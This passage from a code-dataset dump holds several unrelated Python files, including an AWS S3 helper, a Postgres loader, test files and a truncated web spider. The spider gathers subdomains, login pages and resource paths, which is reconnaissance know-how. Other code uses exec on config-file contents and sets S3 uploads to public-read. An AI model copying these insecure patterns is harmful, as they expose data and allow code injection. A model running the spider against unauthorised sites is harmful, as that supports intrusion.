isobe (tisobe@cfa.harvard.edu) #\n# #\n# last update: Mar 04, 2021 #\n# #\n#################################################################################\n\nimport os\nimport sys\nimport re\nimport string\nimport random\nimport operator\nimport math\nimport time\n\npath = '/data/mta/Script/Dumps/Scripts/house_keeping/dir_list'\nwith open(path, 'r') as f:\n data = [line.strip() for line in f.readlines()]\n\nfor ent in data:\n atemp = re.split(':', ent)\n var = atemp[1].strip()\n line = atemp[0].strip()\n exec(\"%s = %s\" %(var, line))\n\nsys.path.append(bin_dir)\nsys.path.append(mta_dir)\n#\n#--- import several functions\n#\nimport pcadfilter\nimport ccdmfilter\nimport maverage\nimport mta_common_functions as mcf\n#\n#--- temp writing file name\n#\nrtail = int(time.time()*random.random())\nzspace = '/tmp/zspace' + str(rtail)\n\n#-----------------------------------------------------------------------------------\n#-- run_rdb_updates: update dataseeker rdb files of ccdm, pacad, mups, and elbilow -\n#-----------------------------------------------------------------------------------\n\ndef run_rdb_updates():\n \"\"\"\n update dataseeker rdb files of ccdm, pacad, mups, and elbilow\n input: none but read from the current trace log files\n output: updated rdb files of ccdm, pacad, mups, and elbilow\n \"\"\"\n#\n#--- read the already processed data list\n#\n pfile = house_keeping + 'rdb_processed_list'\n pdata = mcf.read_data_file(pfile)\n#\n#--- read the currently available data list\n#\n cmd = 'ls ' + main_dir + '/*.tl > ' + zspace\n os.system(cmd)\n\n cdata = mcf.read_data_file(zspace, remove=1)\n#\n#--- find new data\n#\n ndata = list(set(cdata) - set(pdata))\n#\n#--- if there is no new data, exit\n#\n if len(ndata) == 0:\n exit(1)\n#\n#--- make lists for ccdm, pcad, mups...\n#--- also update already processed data list\n#\n fo = open(pfile, 'w')\n fc = open('./ccdmlist', 'w')\n fp = open('./pcadlist', 'w')\n fm = open('./mupslist1', 'w')\n fn = open('./mupslist2', 'w')\n fe = open('./elbilist', 'w')\n\n for ent in ndata:\n fo.write(ent + '\\n')\n\n if make_select_list(fc, ent, 'CCDM'):\n continue\n\n if make_select_list(fp, ent, 'PCAD'):\n continue\n\n if make_select_list(fm, ent, 'MUPSMUPS1'):\n continue\n\n if make_select_list(fn, ent, 'MUPSMUPS2'):\n continue\n\n if make_select_list(fe, ent, 'ELBILOW'):\n continue\n\n fo.close()\n fc.close()\n fp.close()\n fm.close()\n fn.close()\n fe.close()\n#\n#--- run pcad update\n#\n pcadfilter.pcadfilter('./pcadlist')\n#\n#--- run ccdm update\n#\n ccdmfilter.ccdmfilter('./ccdmlist')\n#\n#--- run mups1 udpate; mups2 update will be done separately\n#\n maverage.maverage('mupslist1', 'mups_1.rdb')\n maverage.maverage('mupslist2', 'mups_2.rdb')\n#\n#---- run elbi_low update\n#\n maverage.maverage('elbilist', 'elbi_low.rdb')\n elbi_file = ds_dir + 'elbi_low.rdb'\n maverage.filtersort(elbi_file)\n#\n#--- clean up \n#\n mcf.rm_files('./ccdmlist')\n mcf.rm_files('./pcadlist')\n mcf.rm_files('./mupslist1')\n mcf.rm_files('./mupslist2')\n mcf.rm_files('./elbilist')\n\n#---------------------------------------------------------------------------\n#-- make_select_list: write a line if the line contain \"word\" ---\n#---------------------------------------------------------------------------\n\ndef make_select_list(f, line, word):\n \"\"\"\n write a line if the line contain \"word\"\n input: f --- file indicator\n line --- a line to check and add\n word --- a word to check whether it is in the line\n output: updated file\n return True/False\n \"\"\"\n mc = 
re.search(word, line)\n if mc is not None:\n line = line.strip()\n f.write(line)\n f.write('\\n')\n\n return True\n else:\n return False \n\n#---------------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n\n run_rdb_updates()\n","sub_path":"Dump/update_rdb.py","file_name":"update_rdb.py","file_ext":"py","file_size_in_byte":4654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"273964308","text":"# ROSALIND TASK 10: Mendel's First Law\n\n\ndef genotype_random_mating(population_structure):\n \"\"\"\n This function takes a list as input argument and list must have only three elements:\n number of homozygous dominants , number of heterozygous , number of homozygous recessive\n Function returns a dictionary of double diploid genotypes of mating parents as key\n and probality of such random mating as value.\n \"\"\"\n pop_size = float(sum(population_structure))\n mating_odds = []\n genotypes = ['AAAA', 'AAAa', 'AAaa', 'AaAa', 'AaAA', 'Aaaa', 'aaaa', 'aaAA', 'aaAa']\n for i in range(len(population_structure)):\n mating_odds.append((population_structure[i]/pop_size)*((population_structure[i]-1)/(pop_size-1)))\n temp_pop_structure = list(population_structure)\n del temp_pop_structure[i]\n for pop in temp_pop_structure:\n mating_odds.append((population_structure[i]/pop_size)*(pop/(pop_size-1)))\n return dict(zip(genotypes, mating_odds))\n\n\ndef chances_dominant_progeny(genotype_dict):\n \"\"\"\n This function takes input of form returned by function genotype_random_mating()\n It returns a float value of probability of dominant phenotype offspring.\n \"\"\"\n return round(genotype_dict['AAAA'] + genotype_dict['AAAa'] + genotype_dict['AAaa'] +\n genotype_dict['AaAA'] + ((3*genotype_dict['AaAa'])/4.0) + (genotype_dict['Aaaa']/2.0) +\n genotype_dict['aaAA'] + (genotype_dict['aaAa']/2.0), 5)\n\npopulation_structure = [20, 24, 19]\nchances_dominant_progeny(genotype_random_mating(population_structure))\n\n","sub_path":"probability_dom_progeny.py","file_name":"probability_dom_progeny.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"342067122","text":"from multiprocessing import Pool\nimport random\nimport os\nimport time\n\n\ndef p1():\n print(\"A\")\n # print(\"Run task %s (%s)\" % (name, os.getpid()))\n start = time.time()\n print(\"start time\", start)\n time.sleep(0.1)\n #time.sleep(random.random()*3)\n end = time.time()\n print(\"task A runs %0.2f seconds.\" % (end-start))\n return \"return A\"\n\ndef p2():\n print(\"B\")\n # print(\"Run task %s (%s)\" % (name, os.getpid()))\n start = time.time()\n print(\"start time\", start)\n #time.sleep(random.random()*3)\n time.sleep(0.3)\n end = time.time()\n print(\"task B runs %0.2f seconds.\" % (end-start))\n return \"return B\"\n\ndef p3():\n print(\"C\")\n # print(\"Run task %s (%s)\" % (name, os.getpid()))\n start = time.time()\n print(\"start time\", start)\n #time.sleep(random.random()*3)\n time.sleep(0.2)\n end = time.time()\n print(\"task C runs %0.2f seconds.\" % (end-start))\n return \"return C\"\n\n\nif __name__ == \"__main__\":\n # 1. Pool.apply_async多进程\n print(\"1. 多进程\")\n begin = time.time()\n pool = Pool(2) \n p = [p1, p2, p3]\n results = []\n for h in p:\n results.append(pool.apply_async(h, args=()))\n pool.close()\n pool.join()\n for res in results:\n print(res.get())\n print(\"Done.\")\n print(\"Total time\", time.time() - begin)\n\n # 2. 
Pool.apply单进程\n    print(\"2. 单进程\")\n    begin = time.time()\n    pool = Pool(2) \n    p = [p1, p2, p3]\n    results = []\n    for h in p:\n        results.append(pool.apply(h, args=()))\n    pool.close()\n    pool.join()\n    for res in results:\n        print(res)\n    print(\"Total time\", time.time() - begin)\n\n    # 3.示例\n    print(\"3. 示例\")\n    pool = Pool(4) \n    multiple_results = [pool.apply_async(os.getpid, ()) for i in range(4)]\n    pool.close()\n    pool.join()\n    print([res.get(timeout=1) for res in multiple_results])\n\n\n","sub_path":"tools/py_process_thread/mp/Pool_apply_vs_apply_async.py","file_name":"Pool_apply_vs_apply_async.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"409920788","text":"import os\r\nimport boto3\r\nimport re\r\nimport time\r\nimport utils\r\nfrom botocore.config import Config\r\n\r\nlogger = utils.get_logger()\r\n\r\n# Exceptions raised below when an uploaded bucket or file cannot be verified.\r\nclass s3BucketNotFound(Exception):\r\n    pass\r\n\r\nclass s3FileNotFound(Exception):\r\n    pass\r\n\r\nclass S3:\r\n\r\n    def __init__(self, aws, region = None):\r\n\r\n        self.aws = aws\r\n        config = Config(retries = dict(max_attempts = 20))\r\n        if region is not None:\r\n            self.resource = boto3.resource('s3', aws_access_key_id = aws.key_id, aws_secret_access_key = aws.key, config = config, region_name = region)\r\n            self.client = boto3.client('s3', aws_access_key_id = 
aws.key_id, aws_secret_access_key = aws.key, config = config, region_name = region)\n else:\n self.resource = boto3.resource('s3', aws_access_key_id = aws.key_id, aws_secret_access_key = aws.key, config = config)\n self.client = boto3.client('s3', aws_access_key_id = aws.key_id, aws_secret_access_key = aws.key, config = config)\n\n def get_buckets(self):\n\n buckets_dict = self.client.list_buckets()\n return [k for k in buckets_dict['Buckets']]\n\n\n def get_bucket_list(self, filters = None):\n\n buckets = self.get_buckets()\n if not filters:\n return [k['Name'] for k in buckets]\n return [k['Name'] for k in buckets if filters in k['Name']]\n\n def delete_buckets(self, bucket_list):\n\n result = True\n for name in bucket_list:\n try:\n bucket = self.resource.Bucket(name)\n bucket.objects.all().delete()\n bucket.delete()\n except Exception as e:\n logger.error('Exception while deleting Bucket: {}, Exception: {}'.format(name, e), To_Screen = True)\n result = False\n else:\n logger.info('Deleted Bucket: {}'.format(name), To_Screen = True)\n\n return result\n\n def resource_cleanup(self, resources):\n\n all_names = self.get_bucket_list()\n name_list = all_names if resources else []\n if not resources.get('all'):\n name_list = [k for k in all_names if k in resources.get('name', [])]\n resource_filter = resources.get('filter', {})\n for fltr in resource_filter.get('name', []):\n if not resource_filter.get('ignore_case'):\n name_list.extend([k for k in all_names if fltr in k])\n else:\n name_list.extend([k for k in all_names if fltr.lower() in k.lower()])\n name_list = list(set(name_list))\n name_list = [k for k in name_list if k not in resources.get('exclude_name', [])]\n\n return self.delete_buckets(bucket_list = name_list)\n\n\n def upload_file(self, local_file_name, bucket_name, remote_file_name):\n\n '''\n Create a bucket in the specified bucket with remote file name.\n '''\n\n # Delete bucket if already exist\n if bucket_name in self.get_bucket_list():\n self.delete_buckets([bucket_name])\n\n # Create Bucket\n self.client.create_bucket(Bucket = bucket_name)\n self.client.upload_file(local_file_name, bucket_name, remote_file_name)\n\n # Check file uploaded\n if bucket_name not in self.get_bucket_list():\n raise s3BucketNotFound('Bucket not created: {}'.format(bucket_name))\n\n bucket = self.resource.Bucket(bucket_name)\n objs = list(bucket.objects.filter(Prefix = remote_file_name))\n if not objs:\n raise s3FileNotFound('File not uploaded: {}'.format(remote_file_name))\n\n object_acl = self.resource.ObjectAcl(bucket_name, remote_file_name)\n response = object_acl.put(ACL='public-read')\n\n return \"https://s3.amazonaws.com/{}/{}\".format(bucket_name, remote_file_name)\n\n def upload_file_gov(self, local_file_name, bucket_name, remote_file_name, region):\n\n '''\n Create a bucket in the specified bucket with remote file name.\n '''\n\n # Delete bucket if already exist\n if bucket_name in self.get_bucket_list():\n self.delete_buckets([bucket_name])\n\n # Create Bucket\n self.client.create_bucket(Bucket=bucket_name,CreateBucketConfiguration={'LocationConstraint': region},)\n self.resource.meta.client.upload_file(local_file_name, bucket_name, remote_file_name)\n\n # Check file uploaded\n if bucket_name not in self.get_bucket_list():\n raise s3BucketNotFound('Bucket not created: {}'.format(bucket_name))\n\n bucket = self.resource.Bucket(bucket_name)\n objs = list(bucket.objects.filter(Prefix = remote_file_name))\n if not objs:\n raise s3FileNotFound('File not uploaded: 
{}'.format(remote_file_name))\n\n object_acl = self.resource.ObjectAcl(bucket_name, remote_file_name)\n response = object_acl.put(ACL='public-read')\n\n return \"https://s3-{}.amazonaws.com/{}/{}\".format(region,bucket_name, remote_file_name)\n\n\n","sub_path":"lib/aws_S3.py","file_name":"aws_S3.py","file_ext":"py","file_size_in_byte":4849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"54801967","text":"''' Exports create_app. '''\n\nimport falcon\nfrom szurubooru import api, errors, middleware\n\ndef _on_auth_error(ex, _request, _response, _params):\n raise falcon.HTTPForbidden(\n title='Authentication error', description=str(ex))\n\ndef _on_validation_error(ex, _request, _response, _params):\n raise falcon.HTTPBadRequest(title='Validation error', description=str(ex))\n\ndef _on_search_error(ex, _request, _response, _params):\n raise falcon.HTTPBadRequest(title='Search error', description=str(ex))\n\ndef _on_integrity_error(ex, _request, _response, _params):\n raise falcon.HTTPConflict(\n title='Integrity violation', description=ex.args[0])\n\ndef _on_not_found_error(ex, _request, _response, _params):\n raise falcon.HTTPNotFound(title='Not found', description=str(ex))\n\ndef _on_processing_error(ex, _request, _response, _params):\n raise falcon.HTTPBadRequest(title='Processing error', description=str(ex))\n\ndef create_method_not_allowed(allowed_methods):\n allowed = ', '.join(allowed_methods)\n def method_not_allowed(request, response, **_kwargs):\n response.status = falcon.status_codes.HTTP_405\n response.set_header('Allow', allowed)\n request.context.output = {\n 'title': 'Method not allowed',\n 'description': 'Allowed methods: %r' % allowed_methods,\n }\n return method_not_allowed\n\ndef create_app():\n ''' Create a WSGI compatible App object. '''\n falcon.responders.create_method_not_allowed = create_method_not_allowed\n\n app = falcon.API(\n request_type=api.Request,\n middleware=[\n middleware.RequireJson(),\n middleware.ContextAdapter(),\n middleware.DbSession(),\n middleware.Authenticator(),\n ])\n\n user_list_api = api.UserListApi()\n user_detail_api = api.UserDetailApi()\n tag_category_list_api = api.TagCategoryListApi()\n tag_category_detail_api = api.TagCategoryDetailApi()\n tag_list_api = api.TagListApi()\n tag_detail_api = api.TagDetailApi()\n tag_merge_api = api.TagMergeApi()\n tag_siblings_api = api.TagSiblingsApi()\n password_reset_api = api.PasswordResetApi()\n\n app.add_error_handler(errors.AuthError, _on_auth_error)\n app.add_error_handler(errors.IntegrityError, _on_integrity_error)\n app.add_error_handler(errors.ValidationError, _on_validation_error)\n app.add_error_handler(errors.SearchError, _on_search_error)\n app.add_error_handler(errors.NotFoundError, _on_not_found_error)\n app.add_error_handler(errors.ProcessingError, _on_processing_error)\n\n app.add_route('/users/', user_list_api)\n app.add_route('/user/{user_name}', user_detail_api)\n app.add_route('/tag-categories/', tag_category_list_api)\n app.add_route('/tag-category/{category_name}', tag_category_detail_api)\n app.add_route('/tags/', tag_list_api)\n app.add_route('/tag/{tag_name}', tag_detail_api)\n app.add_route('/tag-merge/', tag_merge_api)\n app.add_route('/tag-siblings/{tag_name}', tag_siblings_api)\n app.add_route('/password-reset/{user_name}', password_reset_api)\n\n return app\n","sub_path":"server/szurubooru/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"93566444","text":"'''working with strings'''\r\nfrom typing import IO, Iterator\r\n\r\n# def reverse_string(inp: str) -> str:\r\n# new_str = ''\r\n# # char = inp[::-1]:\r\n# if inp == '':\r\n# raise ValueError('empty string')\r\n# else:\r\n# for char in inp:\r\n# new_str = char + new_str\r\n \r\n# # print(char)\r\n# return new_str\r\n\r\ndef reverse_string(inp: str) -> str:\r\n '''reversing the input string'''\r\n new_str: str = ''\r\n try:\r\n for i in range(len(inp)-1,-1,-1):\r\n new_str += inp[i]\r\n return new_str\r\n except:\r\n raise ValueError('input is not a string')\r\n\r\n\r\ndef sub_string(target: str, main_string: str) -> int:\r\n '''checking if target substring is in main string and where it is'''\r\n \r\n # if main_string and target and target in main_string: # if main_string and target are not empty and target is in main_string\r\n # count: int = 0\r\n # for offset, char in enumerate(main_string):\r\n # if target[0] == char:\r\n # new_string: str = main_string[offset : offset + len(target)]\r\n # if target == new_string:\r\n # count: int = offset\r\n # return count\r\n # else:\r\n # return -1\r\n\r\n # for i in range(len(main_string) - len(target) + 1):\r\n # if main_string[i:i+len(target)] == target:\r\n # return i\r\n # return -1\r\n\r\n return main_string.find(target, main_string.find(target) + 1)\r\n\r\nprint(sub_string('he', 'hello'))\r\n\r\ndef find_second(target: str, string: str) -> int:\r\n '''checking if target substring is in main string twice or more and return the position of the second'''\r\n\r\n count: int = string.find(target, 0)\r\n if target in string[count + 1: ]:\r\n new_count: int = string.find(target, count + 1)\r\n return new_count\r\n else:\r\n return -1\r\n\r\n\r\ndef get_lines(path: str) -> Iterator[str]:\r\n '''open file and reading lines step by step'''\r\n try:\r\n fp: IO = open(path, 'r', encoding='utf-8')\r\n except FileNotFoundError:\r\n raise FileNotFoundError(f\"Can not open {path}\")\r\n # print (f\"Can not open {path}\")\r\n else:\r\n with fp:\r\n for line in fp:\r\n # line: str = line.strip('\\n')\r\n line: str = line.rstrip('\\n')\r\n # line: str = line.strip()\r\n\r\n while line.endswith(\"\\\\\"):\r\n # line: str = line.strip(\"\\\\\\n\") + fp.readline().strip(\"\\n\")\r\n # line: str = line.strip(\"\\\\\\n\") + fp.readline().rstrip(\"\\n\")\r\n line: str = line[:-1] + next(fp).rstrip(\"\\n\") # strip the trailing \\ and join with the next line\r\n\r\n\r\n # if line == '':\r\n # continue\r\n\r\n # here, lines have been combined so look for a comment\r\n\r\n if not line.startswith('#'):\r\n yield line.split('#')[0] # split returns a list with everything before the #\r\n \r\n # if '#' in line:\r\n # if line.startswith('#'):\r\n # continue\r\n # else:\r\n # line: str = line.split('#', maxsplit=1)[0]\r\n # yield line\r\n\r\n# print(list(get_lines('test1.txt')))","sub_path":"HW05_Himanshu.py","file_name":"HW05_Himanshu.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"74518492","text":"#!/usr/bin/python3\n\n####################################################\n# module: CharFreqMap.py\n# author: vladimir kulyukin\n# creates a dictionary that maps all\n# characters in a given file to their frequencies\n# in the file.\n####################################################\n\nclass CharFreqMap(object):\n @staticmethod\n def computeCharFreqMap(fp):\n char_freq_map = {}\n with open(fp, encoding='utf-8') as f:\n while True:\n c = f.read(1)\n if not c:\n break\n if c in char_freq_map:\n char_freq_map[c] += 1\n else:\n char_freq_map[c] = 1\n return char_freq_map\n","sub_path":"CS3430-ScientificComputingPython/hw12/CharFreqMap.py","file_name":"CharFreqMap.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"301690376","text":"import json\nimport os.path\nimport psycopg2\n\npath = \"./api/all.json\"\nport = 5432\n\nwith open(\"./credentials/postgres\") as credentials:\n content = credentials.readlines()\ncontent = [x.strip() for x in content]\n\n\ndef drop_if_present():\n drop_if_present = \"DROP TABLE IF EXISTS star_wars;\"\n try:\n conn = psycopg2.connect(host=content[0], port=port, database=content[1], user=content[2], password=content[3])\n cur = conn.cursor()\n print(\"dropping table 'star wars'\")\n cur.execute(drop_if_present)\n cur.close()\n conn.commit()\n return 0\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n return -1\n finally:\n if conn is not None:\n conn.close()\n\n\ndef insert(object):\n fields = [\"id\", \"name\", \"height\", \"mass\", \"gender\", \"homeworld\", \"wiki\", \"image\", \"dateCreated\", \"dateDestroyed\", \"destroyedLocation\", \"creator\",\n \"manufacturer\", \"model\", \"class\", \"sensorColor\", \"platingColor\", \"equipment\", \"born\", \"bornLocation\", \"died\", \"diedLocation\",\n \"species\", \"hairColor\", \"eyeColor\", \"skinColor\", \"cybernetics\", \"affiliations\", \"masters\", \"apprentices\", \"formerAffiliations\"]\n insert_sql = \"INSERT INTO star_wars(\" + ', '.join(map(str, fields)) + \") VALUES (\" + \"%s, \" * (len(fields)-1) + \"%s\" \");\"\n print(insert_sql)\n try:\n conn = psycopg2.connect(host=content[0], port=port, database=content[1], 
user=content[2], password=content[3])\n cur = conn.cursor()\n cur.execute(insert_sql, object)\n print(\"insert successful\")\n cur.close()\n conn.commit()\n return 0\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n return -1\n finally:\n if conn is not None:\n conn.close()\n\n\ndef create_table():\n create_sql = \"\"\"\n CREATE TABLE star_wars (\n id bigserial PRIMARY KEY,\n name text NOT NULL,\n height float,\n mass integer,\n gender text, \n homeworld text,\n wiki text,\n image text,\n dateCreated integer,\n dateDestroyed integer,\n destroyedLocation text,\n creator text,\n manufacturer text,\n model text,\n class text, \n sensorColor text,\n platingColor text,\n equipment text,\n born integer,\n bornLocation text,\n died integer,\n diedLocation text,\n species text,\n hairColor text,\n eyeColor text,\n skinColor text,\n cybernetics text,\n affiliations text[],\n masters text[],\n apprentices text[],\n formerAffiliations text[]\n );\n \"\"\"\n try:\n conn = psycopg2.connect(host=content[0], port=port, database=content[1], user=content[2], password=content[3])\n cur = conn.cursor()\n cur.execute(create_sql)\n print(\"table 'star wars' created\")\n cur.close()\n conn.commit()\n return 0\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n return -1\n finally:\n if conn is not None:\n conn.close()\n\n\nif create_table() == -1:\n drop_if_present()\n assert create_table() == 0\n\nif os.path.isfile(path):\n print(\"found file: \" + path)\n\nwith open(path) as json_file:\n fields = [\"id\", \"name\", \"height\", \"mass\", \"gender\", \"homeworld\", \"wiki\", \"image\", \"dateCreated\", \"dateDestroyed\", \"destroyedLocation\", \"creator\",\n \"manufacturer\", \"model\", \"class\", \"sensorColor\", \"platingColor\", \"equipment\", \"born\", \"bornLocation\", \"died\", \"diedLocation\",\n \"species\", \"hairColor\", \"eyeColor\", \"skinColor\", \"cybernetics\", \"affiliations\", \"masters\", \"apprentices\", \"formerAffiliations\"]\n json_data = json.load(json_file)\n for items in json_data:\n items_tuple = [None] * len(fields)\n for key, value in items.items():\n try:\n index = fields.index(key)\n items_tuple[index] = value\n except(ValueError) as error:\n print(error)\n insert(tuple(items_tuple))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"182571559","text":"\"\"\"fileformat.py unit tests.\"\"\"\nimport io\nimport pytest\nfrom unittest.mock import mock_open\nimport pypyr.utils.filesystem as filesystem\n\n# ------------------------ FileRewriter ---------------------------------------\n\n\ndef test_filerewriter_abstract():\n \"\"\"Can't instantiate FileRewriter.\"\"\"\n with pytest.raises(TypeError):\n filesystem.FileRewriter('blah')\n\n\ndef test_filerewriter_in_to_out_abstract():\n \"\"\"Can't invoke in_to_out on abstract base.\"\"\"\n class MyRewriter(filesystem.FileRewriter):\n def in_to_out(self, in1):\n super().in_to_out('blah', 'blah')\n\n x = MyRewriter('blahinit')\n\n with pytest.raises(NotImplementedError):\n x.in_to_out('blah')\n# ------------------------ END of FileRewriter --------------------------------\n\n# ------------------------ ObjectRepresenter ----------------------------------\n\n\ndef test_objectrepresenter_abstract():\n \"\"\"Can't instantiate ObjectRepresenter.\"\"\"\n with pytest.raises(TypeError):\n filesystem.ObjectRepresenter()\n\n\ndef test_object_representer_abc_methods():\n 
\"\"\"Abstract methods do nothing.\"\"\"\n class MyRepresenter(filesystem.ObjectRepresenter):\n def load(self, file):\n super().load(file)\n\n def dump(self, file, payload):\n super().dump(file, payload)\n\n x = MyRepresenter()\n x.load(None)\n x.dump(None, None)\n\n\ndef test_json_representer():\n \"\"\"Json representer load and dump payload.\"\"\"\n representer = filesystem.JsonRepresenter()\n\n in_json = '{\"a\": \"b\", \"c\": [1,2,true]}'\n obj = representer.load(mock_open(read_data=in_json)())\n\n assert obj == {'a': 'b', 'c': [1, 2, True]}\n\n with io.StringIO() as out_text:\n mock_output = mock_open()\n mock_output.return_value.write.side_effect = out_text.write\n representer.dump(mock_output(), obj)\n\n assert out_text.getvalue() == ('{\\n'\n ' \"a\": \"b\",\\n'\n ' \"c\": [\\n'\n ' 1,\\n'\n ' 2,\\n'\n ' true\\n'\n ' ]\\n'\n '}')\n\n\ndef test_yaml_representer():\n \"\"\"Yaml representer load and dump payload.\"\"\"\n representer = filesystem.YamlRepresenter()\n\n in_yaml = ('a: b\\n'\n 'c:\\n'\n ' - 1\\n'\n ' - 2\\n'\n ' - True\\n')\n obj = representer.load(mock_open(read_data=in_yaml)())\n\n assert obj == {'a': 'b', 'c': [1, 2, True]}\n\n with io.StringIO() as out_text:\n mock_output = mock_open()\n mock_output.return_value.write.side_effect = out_text.write\n representer.dump(mock_output(), obj)\n\n assert out_text.getvalue() == ('a: b\\n'\n 'c:\\n'\n ' - 1\\n'\n ' - 2\\n'\n ' - true\\n')\n\n# ------------------------ END ObjectRepresenter ------------------------------\n\n# ------------------------ is_same_file --------------------------------------\n\n\ndef test_is_same_file_none():\n \"\"\"Empty paths not same.\"\"\"\n assert not filesystem.is_same_file(None, '')\n\n\n# ------------------------ END is_same_file -----------------------------------\n","sub_path":"tests/unit/pypyr/utils/filesystem_test.py","file_name":"filesystem_test.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"66624035","text":"import re\nimport json\nimport memcache\nimport requests\nfrom urllib.parse import urlparse\n\ndomainCN_pattern = re.compile( # 中国开放注册的域名\n r'https?://[^\\s]*.cn[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.com[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.top[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.vip[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.top[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.xyz[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.ltd[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.art[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.edu[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.wang[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.beer[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.cloud[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.store[a-zA-Z0-9/?=#&]*|'\n r'https?://[^\\s]*.online[a-zA-Z0-9/?=#&]*'\n)\n\n# 本地资源|本域资源\n# 1、 =https://antiy.cn/static/images/user.admin_1002.svg\n# 2、 =//antiy.cn/static/images/user.admin_1002.svg\n# src=\"./js-plugin/jquery-ui/jquery-ui-1.8.23.custom.min.js\"\nresource_local_pattern = re.compile(\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.js\"|' # 编程语言\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.py\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.sh\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.go\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.exe\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.asp\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.php\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.java\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.gz\"|' # 包\n 
r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.tar\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.jpg\"|' # 前端静态资源\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.svg\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.ico\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.png\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.css\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.s?html?\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.txt\"|' # 配置文件\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.xml\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.conf\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.json\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.yaml\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.toml\"|'\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.docx?\"|' # 文档\n r'=\"\\.?/?[a-zA-Z/-]*/?[a-zA-Z0-9._-]*\\.pptx?\"',\n re.IGNORECASE\n)\n\n\nclass WebSpider:\n def __init__(self):\n self.login_page = set() # 集合就已经自动去重\n self.resource_path = set()\n self.subdomain = set()\n self.urls = set()\n self.headers = {'user-agent': \"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36\"}\n\n # URL发现\n def url_find(self, text, ip=None, domain=None): # 无需提供端口\n if domain: # 提取本域url\n pattern = re.compile('https?://[^\\s]*{}:?[a-zA-Z0-9/\\?=#&_\\.]*'.format(domain))\n result = set(re.findall(pattern, text))\n self.urls = self.urls | result\n elif ip:\n pattern = re.compile('https?://[^\\s]*{}:?[a-zA-Z0-9/\\?=#&_\\.]*'.format(ip))\n result = set(re.findall(pattern, text))\n self.urls = self.urls | result\n\n # 子域发现 域名专供\n def subdomain_find(self, domain, text):\n '''\n 1、从url分析取的\n 2、从信息取的 cdn.www.cnblogs.cn\n '''\n if not domain:\n return []\n pattern = re.compile('[a-zA-Z0-9\\.]+{}'.format(domain))\n result = set(re.findall(pattern, text))\n self.subdomain = self.subdomain | result\n\n def resource_find(self, urls=None, text=None):\n # 1、本域|本IP资源发现, 从url中进行parse\n if urls:\n for url in urls:\n attr = urlparse(url)\n path = 